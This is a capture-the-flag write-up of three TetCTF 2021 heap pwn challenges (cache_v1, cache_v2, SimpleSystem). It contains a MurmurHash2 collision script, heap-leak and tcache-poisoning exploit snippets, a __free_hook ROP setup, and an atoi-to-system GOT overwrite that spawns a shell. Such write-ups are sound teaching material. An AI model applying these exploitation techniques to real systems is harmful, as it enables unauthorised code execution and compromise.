
TetCTF2021 - cache_v1, cache_v2, SimpleSystem writeups


As always, TetCTF is a great event to start the year with. This year, I managed to first-blood (and we Efiens are being the only Vietnamese team that can solve) the 3 phenomenal heap pwning challenges. Here are my writeups for them.

Use the table of contents on the right to navigate to the challenge that you are interested in.



Challenge Info
  • Given files: cache, cache.cpp,,
  • Description: Flag stored in /home/cache/flag
  • Category: Pwnable (actually crypwn, to be exact)
  • Summary: A C++ glibc 2.31 heap challenge with seccomp rules that is very strict. We are given the source file for this challenge, so reverse engineering it is not a problem. The challenge also requires some math and crypto knowledge.
  1. Analyze the source code -> Found that the caches use the name’s std::hash as the key -> Maybe vulnearable to hash collision.
  2. Find two names whose hashes collide -> Create a small cache first, then create a large one that collides with it will cause an out-of-bound read and write.
  3. Setup the heap perfectly to exploit.
  4. Use OOB read to leak heap and libc.
  5. Use OOB write to poison tcache -> overwrite __free_hook into ROP to workaround seccomp and read the flag.

Analyzing the source code

This program is a cache management system implemented in C++, it has the following functionalities:

  • Create a cache with a unique name and (almost) arbitrary positive size (the upper bound is very high).
  • Read data from a cache at an offset.
  • Write data to a cache at an offset.
  • Erase a cache.

The create cache option uses a global unordered_map called caches to keep track of created caches. It is indexed by a key which is the std::hash<std::string>{}(name) of the inputted name. This is maybe vulnearable to a hash collision attack, because if we can find two names that have the same hash, we can overlap a cache’s size with another’s:

caches[std::hash<std::string>{}(name)].size = size;

Also, the cache’s chunk to store the content on the heap is only created when we try to write into it, not when we create it, so we can write to a small cache to create a small chunk, then over write the size with the large one.

Because I couldn’t find another vulnerability in the implementation, this is the path that I followed.

Also, this is the output of seccomp-tools dump on the binary:

line  CODE  JT   JF      K
0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x09 0xc000003e  if (A != ARCH_X86_64) goto 0011
0002: 0x20 0x00 0x00 0x00000000  A = sys_number
0003: 0x35 0x07 0x00 0x40000000  if (A >= 0x40000000) goto 0011
0004: 0x15 0x07 0x00 0x00000002  if (A == open) goto 0012
0005: 0x15 0x06 0x00 0x00000000  if (A == read) goto 0012
0006: 0x15 0x05 0x00 0x00000001  if (A == write) goto 0012
0007: 0x15 0x04 0x00 0x00000003  if (A == close) goto 0012
0008: 0x15 0x03 0x00 0x0000000c  if (A == brk) goto 0012
0009: 0x15 0x02 0x00 0x00000009  if (A == mmap) goto 0012
0010: 0x15 0x01 0x00 0x000000e7  if (A == exit_group) goto 0012
0011: 0x06 0x00 0x00 0x00000000  return KILL
0012: 0x06 0x00 0x00 0x7fff0000  return ALLOW

Finding hash collision

I don’t know much about math and cryptography, so I started googling to see which hashing algorithm does C++ standard library use. It lead me to this site, where most variances of MurmurHash is implemented. The version that C++ standard library uses in a 64-bit environment is MurmurHash2Unaligned, which is implemented as MurmurHash64A in MurmurHash2_64.cpp.

More googling on how to collide this hash lead me to this post, which shows in details how to create collided keys for MurmurHash2. The implementation of MurmurHash2 in the blog post is almost identical to the one in C++, except some constants. I asked my team’s crypto player @pcback to read it and try to re-implement it for me, and he came up with this script:

INV_MAGIC = 0x5f7a0ea7e59b19bd
R = 16
MASK64 = 0xffffffffffffffff
DIFF = b"\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x80"
m = (0xc6a4a793 << 32) | 0x5bd1e995
h = (0xc70f6907 ^ (16 * m)) & (2**64 - 1)
r = 47

def unshiftRight(x, shift):
    res = x
    for i in range(64):
        res = x ^ res >> shift
    return res

def invert64(n):
    x = (n * 0x5f7a0ea7e59b19bd) & MASK64
    x = unshiftRight(x, r)
    x = (x * 0x5f7a0ea7e59b19bd) & MASK64
    return int.to_bytes(x, 8, 'little')

a = b'A'*16
b = bytes(x^y for x,y in zip(a,DIFF))

x1, x2 = int.from_bytes(a[:8], 'little'), int.from_bytes(a[8:], 'little')
y1, y2 = int.from_bytes(b[:8], 'little'), int.from_bytes(b[8:], 'little')

print((invert64(y1) + invert64(y2)).hex())
print((invert64(x1) + invert64(x2)).hex())

The script provides two strings whose hashes collide (hex-encoded):


With that in hands, I could continue with the exploit.

Setup the heap

With the hash collision in hands, my plan was clear: Create a small cache, then collide it with a larger one to achieve out-of-bound read and write through that cache. The first step is to perfectly construct the heap so that I could read/write all the stuffs I need:

## Create a small cache to collide on later
create(collide1, 0x30) 
write(collide1, 0, 8, "A"*8)

## Create victim caches to poison
create("victim1", 0x100) 
write("victim1", 0, 8, "B"*8)
create("victim2", 0x100) 
write("victim2", 0, 8, "C"*8)

## Create large cache to leak libc
create("leak", 0x2000) 
write("leak", 0, 8, "D"*8)

## Create padding cache to avoid consolidate
create("padd", 0x40) 
write("padd", 0, 8, "E"*8)

## Collide the first cache with a very large one
create(collide2, 0x2000) 

With the above setup, I have two small victim chunks to poison later, and a large chunk that will go into unsorted bin when freed to leak libc.

Leak heap and libc

Simply read a heap pointer that is stored somewhere on the heap to leak heap, and free the large chunk to leak libc:

## Leak heap
read(collide2, 0x40, 8)
heap = u64(r.recv(8)) - 0x144d0"heap: {}".format(hex(heap)))

## Erase large cache, leak libc
read(collide2, 0x380, 8)
l.address = u64(r.recv(8)) - 0x1ebbe0"libc: {}".format(hex(l.address)))

Tcache poisoning

Freeing the two victim chunks and we can easily overwrite their fd pointer, classic tcache poisoning. With that, I now could overwrite __free_hook and also had all the leaked addresses in my hands. I could just use my ROP chain that I explained here to read the flag. Note that the payload must be put into a cache’s name, not content, because the name is what actually got free() first when we call erase.

## Erase victims, overwrite victim2's fd to __free_hook
write(collide2, 0x200, 8, p64(l.symbols["__free_hook"]))

## Build ROP payload
base = heap + 0x124b0             ## payload_base (address of the chunk)
payload = b"A"*8                  ## <-- [rdi] <-- payload_base
... ## read the full payload in my other post or my full script
payload += b"/home/cache/flag"

## Create a cache with payload as its name
create(payload, 0x100)
write(payload, 0, 8, "A"*8)

## Overwrite __free_hook with call_gadget
create("free", 0x100)
write("free", 0, 8, p64(call_gadget))

## Execute the chain

The flag is:



The MurmurHash2 implementation in C++ standard library is MurmurHash2.cpp.

The script for finding hash collision is

The full exploit is



Challenge Info
  • Given files: cache, cache.cpp,,
  • Description: Flag stored in /home/cache/flag
  • Category: Pwnable
  • Summary: Another C++ glibc 2.31 heap challenge that is the sequel to cache_v1. The source code is also given although the implementation of the system is different from cache_v1.
  1. Analyze the source code -> Found that there is a uint8_t integer overflow in refCount.
  2. Create a large cache, duplicate it over and over to overflow refCount, then erase it -> unique_ptr will be deleted and the pointer it’s managing will point to tcache_perthread_struct -> Can read and write (almost) anywhere on the heap with this.
  3. Setup the heap perfectly to exploit.
  4. Use OOB read to leak heap and libc.
  5. Use OOB write to poison tcache -> overwrite __free_hook into ROP to workaround seccomp and read the flag.

Analyzing the source code

This program is a cache management system implemented in C++, its functionalities is the same as cache_v1, with the addition of Duplicate:

  • Create a cache with a unique name and (almost) arbitrary positive size (the upper bound is very high).
  • Read data from a cache at an offset.
  • Write data to a cache at an offset.
  • Erase a cache.
  • Duplicate a cache to another cache with different name, but similar content.

This time, there is no hashing to mess with. Also, the pointer to the content of each cache is now managed by C++ unique_ptr. In short, unique_ptr will manage a pointer inside itself, and uniquely own it. There is no way other smart pointers can refer to a pointer that a unique_ptr is managing.

When a cache is duplicated, the method reference() will be called to increase refCount by 1, and when it is erased, release() will be called to decrease refCount by 1. If refCount reaches 0, it means that the cache is no longer referred by any existing cache, therefore it will be deleted, along with its unique_ptr. There is a bound check that a cache can only be referenced upto UINT8_MAX, but here is the bug: the refCount’s data type itself is uint8_t, so it will never surpass that max, instead, it will overflow and go back to 0. Therefore, we can duplicate a cache 256 times to make refCount rolls back to 1, then erase it. Doing that leaves us with an erased cache that has a lot of duplicates referencing to it. This leads to a use-after-free bug upon accessing any of those duplicates.

Erasing an overflowed cache

When we erase a cache, it’s unique_ptr will also be erased. This structure is also stored on the heap, and the important part is that the pointer that it is managing is stored as the second QWORD of the struct. The unique_ptr struct is small enough that it will be inserted into tcache when it’s free, and in libc 2.31, when a tcache is free, it’s second QWORD will contain a so-called key, which is the pointer to tcache_perthread_struct at the start of the heap. Therefore, when we .get() from this freed unique_ptr, we actually have access to the pointer to that start of the heap. It all happens when we erase a large cache whose refCount is overflowed, and then we can read/write in a very large range from it. So effectively, we can read and write anywhere on the heap from that point.

Setup the heap

Again, like cache_v1, we setup the heap perfectly for our exploitation, then overflow and erase a large cache:

## Create a victim caches
create("victim1", 0x100)
write("victim1", 0, 8, "A"*8)
create("victim2", 0x100)
write("victim2", 0, 8, "B"*8)

## Create a large cache to duplicate over and over
create("orig", 0x18000)
write("orig", 0, 8, "A"*8)

## Duplicate orig 256 times
for i in range(256):
    duplicate("orig", "dup_{}".format(i))

## Erase dup_0, orig's unique_ptr will now point at tcache_perthread_struct (top of heap)

Notice that I created the victim caches first, because it will make them closer to the top, we don’t want them to be far after those duplicated caches. The targeted cache size is also set to be very large (0x18000). Also, I deleted dup_0 instead of orig, because orig is the only one that we can safely read and write from (it’s not flagged as a duplicate).

Leak heap and libc

Simply read a heap and a libc pointer on the heap, we don’t even need to free a large chunk this time because the targeted chunk is already a large one and will be inserted to unsorted bin.

## Leak heap
read("orig", 0x11ea8, 8)
heap = u64(r.recv(8)) - 0x11ed0"heap: {}".format(hex(heap)))

## Leak libc
read("orig", 0x12238, 8)
l.address = u64(r.recv(8)) - 0x1ebbe0"libc: {}".format(hex(l.address)))

Tcache poisoning

Exactly the same as cache_v1: Freeing the two victim chunks and we can easily overwrite their fd pointer, classic tcache poisoning. With that, I now can overwrite __free_hook and also have all the leaked addresses in my hands. I could just use my ROP chain that I explained here to read the flag. Note that the payload must be put into a cache’s name, not content, because the name is what actually got free() first when we call erase.

## Erase victims, overwrite victim2's fd to __free_hook
write("orig", 0x120b0, 8, p64(l.symbols["__free_hook"]))

## Build ROP payload
base = heap + 0x2d190             ## payload_base (address of the chunk)
payload = b"A"*8                  ## <-- [rdi] <-- payload_base
... ## read the full payload in my other post or my full script
payload += b"/home/cache/flag"

## Create a cache with payload as its name
create(payload, 0x100)
write(payload, 0, 8, "A"*8)

## Overwrite __free_hook with call_gadget
create("free", 0x100)
write("free", 0, 8, p64(call_gadget))

## Execute the chain

The flag is:



The full exploit is



Challenge Info
  • Given files: SimpleSystem,
  • Category: Pwnable
  • Hint: do you know an arena can be reused when arena list is full ?
  • Summary: A glibc 2.23 heap challenges that is very unique. It is a simple system (as the name suggest) that we can signup, signin and use its functionalities, it utilizes multithreading to implement them. The bug is in the synchronization implementation of multithreading, and the exploitation relies on how glibc handles malloc() on multithreaded environment (although there is another intended bug in the authentication process, but it is not needed).
  1. Analyze the executable -> Found that after signing in, if we go into sleep mode, then signout & delete, then signin again, we can signin to a deleted session due to a failed implementation of synchronization semaphore.
  2. Create a lot of users, signin to 1 of them and use the above bug -> leak libc when show_info.
  3. Signin to 8 others and put them to a long sleep mode -> Use maximum number of heap arenas.
  4. Use the above bug on the 1st user again -> the bk pointer of an unsorted bin actually set the is_admin flag to true.
  5. Create 7 notes to fill up the other arenas -> 8th note will be in main arena -> Overlap on session itself.
  6. Overwrite session->fullname to leak heap.
  7. Edit note to overwrite session->head, edit again to overwrite atoi@GOT into system().
  8. Input sh into choice prompt -> Get shell.

Analyzing the binary

On startup, the program gives us 2 options:

  • Signup to create an account. We will be asked for a fullname, a username and a password. If they are valid, the username will be used to create a directory underneath creds to store 2 files u.dat and p.dat, with u.dat storing the full name and p.dat storing the MD5 hash of the password.
  • Signin to signin to an account. The program will ask for the username and the password to check if they exist. If they do, it will lookup a session list to see if that user is currently having a session or not, if not, it will create a session for it. It also checks if the username is admin or not to set the is_admin flag. The session struct is as follows:
struct str_session
    char padd[8];
    __int64 is_admin;
    __int64 sess_id;
    pthread_mutex_t mutex_lock;
    char* fullname;
    char username[0x30];
    __int64 note_id;
    str_note* head;
    str_note* tail;
Actually, as the author @d4rkn3ss reveals, there is a path truncation bug in the authentication process that can let you login to anything and read any file. With this you can leak every addresses through /proc/self/maps, leak admin’s hashed password to crack it, and leak the number of CPUs through /proc/cpuinfo. But I still managed to solve this without using this bug.

After logging in, we have 6 options to choose from, each of these actions will be run on a separate thread, synchronized by a mutex_lock within each session and a global semaphore:

  1. Add a note. This can only be performed as an admin, the note size can be up to 0xFFFF and notes are stored as a linked list.
  2. Edit a note. This also can only be performed as admin.
  3. Show user info. This shows the user’s fullname and notes.
  4. Sleep mode. This puts the current thread to sleep() for the inputted amount of time (in seconds).
  5. Signout & delete: signout of the current session and delete it, freeing everything its own.
  6. Signout: signout of the current session, but still keep it in the session list.

This is the struct of a note:

struct str_note
    str_note* next;
    __int64 size;
    char* content;

The bug here is that even though in signout & delete the program tries to acquire the mutex_lock, it doesn’t call sem_wait() on the semaphore on the way out and goes straight into sem_destroy(). This way, if we go into sleep mode, the mutex_lock will be acquired and sem_post() will increment semaphore before sleep(), after that when we choose to signout & delete, this thread must wait for the sleeping thread to unlock its mutex_lock before it can execute, but the thing is on the main thread after signout & delete, it doesn’t need to wait for the semaphore of the sleeping thread to be incremented before proceeding, therefore it will signout to the main menu on the main thread, while the deleting thread is still waiting for the mutex_lock. In short, we have 3 threads here:

  • the sleeping thread holding the mutex_lock, incrementing the semaphore.
  • the deleting thread waiting for mutex_lock to be released to proceed.
  • the main thread, which should be waiting for the semaphore, is instead ignoring it and signout to main menu.

Using this bug, we can: signin -> sleep -> signout & delete -> signin to sign back into a deleted session. Notice that the is_admin flag in the session struct is located at the 2nd QWORD, it will be overwrited by the bk pointer of an unsorted bin, therefore we have a “fake” admin in this deleted session. Also the fullname chunk is freed, so we can show info to leak the libc address from it.

## Leak libc with synchronization bug -> UAF
signin(user[0], user[0])
signin(user[0], user[0])
r.recvuntil("Your name: ")
l.address = u64(r.recv(6) + b'\0'*2) - 0x3c4b78"libc: {}".format(hex(l.address)))

Exploit the multithreaded heap

The exploitation path is quite clear then: if we can add a note exactly the same size as a session struct, then it will be allocated at the freed session we are currently in and we can overwrite everything in it. But here is the big problem: Each thread will malloc() into its own heap arena, so initially, it seems like there are no way to malloc() into the main arena from another thread.

That’s when the hint comes in handy. By googling about this multithreading heap management stuff, I came into this doc about MallocInternals. It says that the maximum number of heap arenas is 8 * number-of-processors. After all the arenas have been allocated, threads will try to reuse one of the other arenas. This is so nice because we can use sleep mode to create a lot of hanging threads, then try to malloc() into the main arena in the next (the author is nice enough to even make a call to malloc() in sleep mode). That’s exactly what I did, even though the intended way is to read /proc/cpuinfo to know the number of processors, I just assumed that it’s 1 and try it out (if it’s not I could always bruteforce it, can’t be too big anyway). Therefore I created 8 sleeping threads:

## Fill all 8 created arenas with 8 notes
for i in range(1, 9):
    signin(user[i], user[i])
    sleep_thread(i + 100)

Now the next malloc() should be into the main arena, but not really. The way allocation works after filling the arenas is weird. I haven’t read any resource about it yet, but as I experimented it, it seems like the program cycles through each of the arena on each thread to make new allocations. I’m not really sure about this, but what I did was doing trials-and-errors and I found that if I create 7 dummy notes, the 8th one will by in main arena, also set the note size to 0x90 to be the same as a session struct.

## Fill all 8 created arenas with 8 notes
r.sendlineafter("Size: \n", str(0x90))
r.sendafter("Content: \n", "0"*8) ## note 0
for i in range(1, 8):
    add_note(0x90, chr(i)*8) ## note 1 -> 7

## Next note will be in main arena, overwrite freed session -> overwrite full name to leak heap
payload1 = p64(0) + p64(1)
payload1 += p64(0) ## sess_id
payload1 += p64(2) + p64(0x100000eee) + p64(0)*3 ## mutex lock
payload1 += p64(0x603190) ## full name -> leak
add_note(0x90, payload1) ## note 8
r.recvuntil("Your name: ")
heap = u64(r.recv(4) + b'\0'*4) - 0x19f0"heap: {}".format(hex(heap)))

I used this note to overwrite fullname to a pointer to the session list (the binary has No PIE) to leak heap address. I also had to make sure that the other overwritten fields of session are acceptable by the process, especially the mutex_lock one.

Overwrite GOT and get shell

Now I can use edit to overwrite str_session->head to the start of session struct, where I created a fake note whose str_note->content points to atoi@GOT. Then editting this note again to overwrite atoi@GOT to system. For the next prompt to make a choice to the options, I could just pass sh to it, then atoi("sh") will be called, which actually is system("sh") now.

## Edit to point to atoi@GOTS
payload2 = p64(0) + p64(0x90)
payload2 += p64(["atoi"]) ## sess_id
payload2 += p64(2) + p64(0x100000eee) + p64(0)*3 ## mutex lock
payload2 += p64(0) ## full name
payload2 += p64(0)*6 ## username
payload2 += p64(1) ## note_id
payload2 += p64(heap + 0xe90) ## head
payload2 += p64(heap + 0xe90) ## tail
edit_note(0, payload2)

## Edit again to overwrite atoi@GOTS
edit_note(0, p64(l.symbols["system"]))

## Get shell
r.sendlineafter("choice: \n", "sh")

The flag is:

TetCTF{vina: *100*50421406550161##}


The full exploit is